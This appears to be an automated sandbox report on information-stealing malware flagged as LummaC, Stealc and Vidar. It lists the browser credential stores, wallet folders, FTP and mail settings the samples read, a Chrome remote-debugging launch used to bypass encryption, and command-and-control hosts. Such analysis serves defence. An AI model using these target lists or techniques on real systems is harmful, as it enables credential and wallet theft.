                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shmJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journalJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                          Tries to harvest and steal ftp login credentials
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                          Tries to steal Crypto Currency Wallets
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                          Tries to steal Mail credentials (via file / registry access)
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFL
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFL
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWT
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWT
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWT
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWT
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDB
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDB
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIU
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIU
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                          Source: Yara matchFile source: 00000000.00000002.2727922118.0000000000B74000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000003.3341908004.000000000149C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000003.3362083750.00000000014A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000003.3314391568.000000000149C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000003.3314921050.000000000149F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000003.3360346452.000000000149F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000003.3316698804.000000000149F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7276, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: fc1511c233.exe PID: 3636, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Attempt to bypass Chrome Application-Bound Encryption
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                          Yara detected Credential Flusher
                          Source: Yara matchFile source: Process Memory Space: 1b3b76c439.exe PID: 7712, type: MEMORYSTR
                          Yara detected LummaC Stealer
                          Source: Yara matchFile source: Process Memory Space: fc1511c233.exe PID: 3636, type: MEMORYSTR
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Yara detected Stealc
                          Source: Yara matchFile source: 0000001C.00000002.3259318138.00000000008B1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000003.3348999903.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2727922118.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000002.3262194656.000000000140E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000003.3200675680.0000000005280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2156119488.0000000005320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2729388458.000000000155E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7276, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 6ae2430bb1.exe PID: 5396, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 6ae2430bb1.exe PID: 6464, type: MEMORYSTR
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Yara detected Vidar stealer
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7276, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB60C40 sqlite3_bind_zeroblob,0_2_6CB60C40
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB60D60 sqlite3_bind_parameter_name,0_2_6CB60D60
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA88EA0 sqlite3_clear_bindings,0_2_6CA88EA0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB60B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,0_2_6CB60B40
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA86410 bind,WSAGetLastError,0_2_6CA86410
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA860B0 listen,WSAGetLastError,0_2_6CA860B0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA8C030 sqlite3_bind_parameter_count,0_2_6CA8C030
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA86070 PR_Listen,0_2_6CA86070
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA8C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,0_2_6CA8C050
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA122D0 sqlite3_bind_blob,0_2_6CA122D0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA863C0 PR_Bind,0_2_6CA863C0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_008AEC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,22_2_008AEC48
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_008ADF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,22_2_008ADF51

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                          Native API                          		1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		11
                          Disable or Modify Tools                          		2
                          OS Credential Dumping                          		2
                          System Time Discovery                          		Remote Services1
                          Archive Collected Data                          		12
                          Ingress Tool Transfer                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts2
                          Command and Scripting Interpreter                          		1
                          Scheduled Task/Job                          		1
                          Extra Window Memory Injection                          		1
                          Deobfuscate/Decode Files or Information                          		LSASS Memory1
                          Account Discovery                          		Remote Desktop Protocol41
                          Data from Local System                          		21
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts1
                          Scheduled Task/Job                          		11
                          Registry Run Keys / Startup Folder                          		12
                          Process Injection                          		4
                          Obfuscated Files or Information                          		Security Account Manager12
                          File and Directory Discovery                          		SMB/Windows Admin Shares1
                          Email Collection                          		1
                          Remote Access Software                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                          Scheduled Task/Job                          		12
                          Software Packing                          		NTDS238
                          System Information Discovery                          		Distributed Component Object ModelInput Capture3
                          Non-Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
                          Registry Run Keys / Startup Folder                          		1
                          DLL Side-Loading                          		LSA Secrets1
                          Query Registry                          		SSHKeylogging114
                          Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          Extra Window Memory Injection                          		Cached Domain Credentials861
                          Security Software Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                          Masquerading                          		DCSync2
                          Process Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job341
                          Virtualization/Sandbox Evasion                          		Proc Filesystem341
                          Virtualization/Sandbox Evasion                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                          Process Injection                          		/etc/passwd and /etc/shadow1
                          System Owner/User Discovery                          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568907 Sample: file.exe Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 97 youtube.com 2->97 99 spocs.getpocket.com 2->99 101 12 other IPs or domains 2->101 143 Suricata IDS alerts for network traffic 2->143 145 Found malware configuration 2->145 147 Malicious sample detected (through community Yara rule) 2->147 149 19 other signatures 2->149 12 file.exe 36 2->12         started        17 fc1511c233.exe 2->17         started        19 skotes.exe 2->19         started        21 3 other processes 2->21 signatures3 process4 dnsIp5 115 185.215.113.16, 49866, 80 WHOLESALECONNECTIONSNL Portugal 12->115 117 185.215.113.206, 49714, 49763, 49809 WHOLESALECONNECTIONSNL Portugal 12->117 119 127.0.0.1 unknown unknown 12->119 81 C:\Users\user\DocumentsBFBFBFIIJ.exe, PE32 12->81 dropped 83 C:\Users\user\AppData\...\softokn3[1].dll, PE32 12->83 dropped 85 C:\Users\user\AppData\Local\...\random[1].exe, PE32 12->85 dropped 87 11 other files (7 malicious) 12->87 dropped 181 Detected unpacking (changes PE section rights) 12->181 183 Attempt to bypass Chrome Application-Bound Encryption 12->183 185 Drops PE files to the document folder of the user 12->185 193 8 other signatures 12->193 23 cmd.exe 1 12->23         started        25 msedge.exe 2 10 12->25         started        28 chrome.exe 12->28         started        187 Hides threads from debuggers 17->187 189 Tries to detect sandboxes / dynamic malware analysis system (registry check) 17->189 191 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 17->191 31 firefox.exe 21->31         started        33 msedge.exe 21->33         started        file6 signatures7 process8 dnsIp9 35 EBFBFBFIIJ.exe 4 23->35         started        39 conhost.exe 23->39         started        179 Monitors registry run keys for changes 25->179 41 msedge.exe 25->41         started        121 192.168.2.4 unknown unknown 28->121 123 239.255.255.250 unknown Reserved 28->123 43 chrome.exe 28->43         started        125 youtube.com 142.250.181.78 GOOGLEUS United States 31->125 127 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 GOOGLEUS United States 31->127 129 4 other IPs or domains 31->129 signatures10 process11 dnsIp12 79 C:\Users\user\AppData\Local\...\skotes.exe, PE32 35->79 dropped 151 Detected unpacking (changes PE section rights) 35->151 153 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 35->153 155 Tries to evade debugger and weak emulator (self modifying code) 35->155 157 4 other signatures 35->157 46 skotes.exe 4 37 35->46         started        109 www3.l.google.com 142.250.181.142, 443, 49770 GOOGLEUS United States 43->109 111 www.google.com 142.250.181.68, 443, 49729, 49730 GOOGLEUS United States 43->111 113 4 other IPs or domains 43->113 file13 signatures14 process15 dnsIp16 131 185.215.113.43, 49909, 49918, 49944 WHOLESALECONNECTIONSNL Portugal 46->131 133 31.41.244.11, 49923, 49947, 80 AEROEXPRESS-ASRU Russian Federation 46->133 89 C:\Users\user\AppData\...\f9882ce6c1.exe, PE32 46->89 dropped 91 C:\Users\user\AppData\...\1b3b76c439.exe, PE32 46->91 dropped 93 C:\Users\user\AppData\...\6ae2430bb1.exe, PE32 46->93 dropped 95 9 other malicious files 46->95 dropped 135 Detected unpacking (changes PE section rights) 46->135 137 Creates multiple autostart registry keys 46->137 139 Tries to evade debugger and weak emulator (self modifying code) 46->139 141 3 other signatures 46->141 51 fc1511c233.exe 46->51         started        55 6ae2430bb1.exe 46->55         started        57 e6d73861f4.exe 46->57         started        59 2 other processes 46->59 file17 signatures18 process19 dnsIp20 103 atten-supporse.biz 172.67.165.166 CLOUDFLARENETUS United States 51->103 159 Multi AV Scanner detection for dropped file 51->159 161 Detected unpacking (changes PE section rights) 51->161 163 Query firmware table information (likely to detect VMs) 51->163 177 3 other signatures 51->177 165 Tries to detect sandboxes and other dynamic analysis tools (window names) 55->165 167 Tries to evade debugger and weak emulator (self modifying code) 55->167 169 Hides threads from debuggers 55->169 105 92.63.197.221 NOVOGARA-ASNL Russian Federation 57->105 171 Tries to detect sandboxes / dynamic malware analysis system (registry check) 57->171 173 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 57->173 107 dare-curbys.biz 172.67.181.44, 443, 49945, 49952 CLOUDFLARENETUS United States 59->107 175 Binary is likely a compiled AutoIt script file 59->175 61 taskkill.exe 59->61         started        63 taskkill.exe 59->63         started        65 taskkill.exe 59->65         started        67 3 other processes 59->67 signatures21 process22 process23 69 conhost.exe 61->69         started        71 conhost.exe 63->71         started        73 conhost.exe 65->73         started        75 conhost.exe 67->75         started        77 conhost.exe 67->77         started       

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.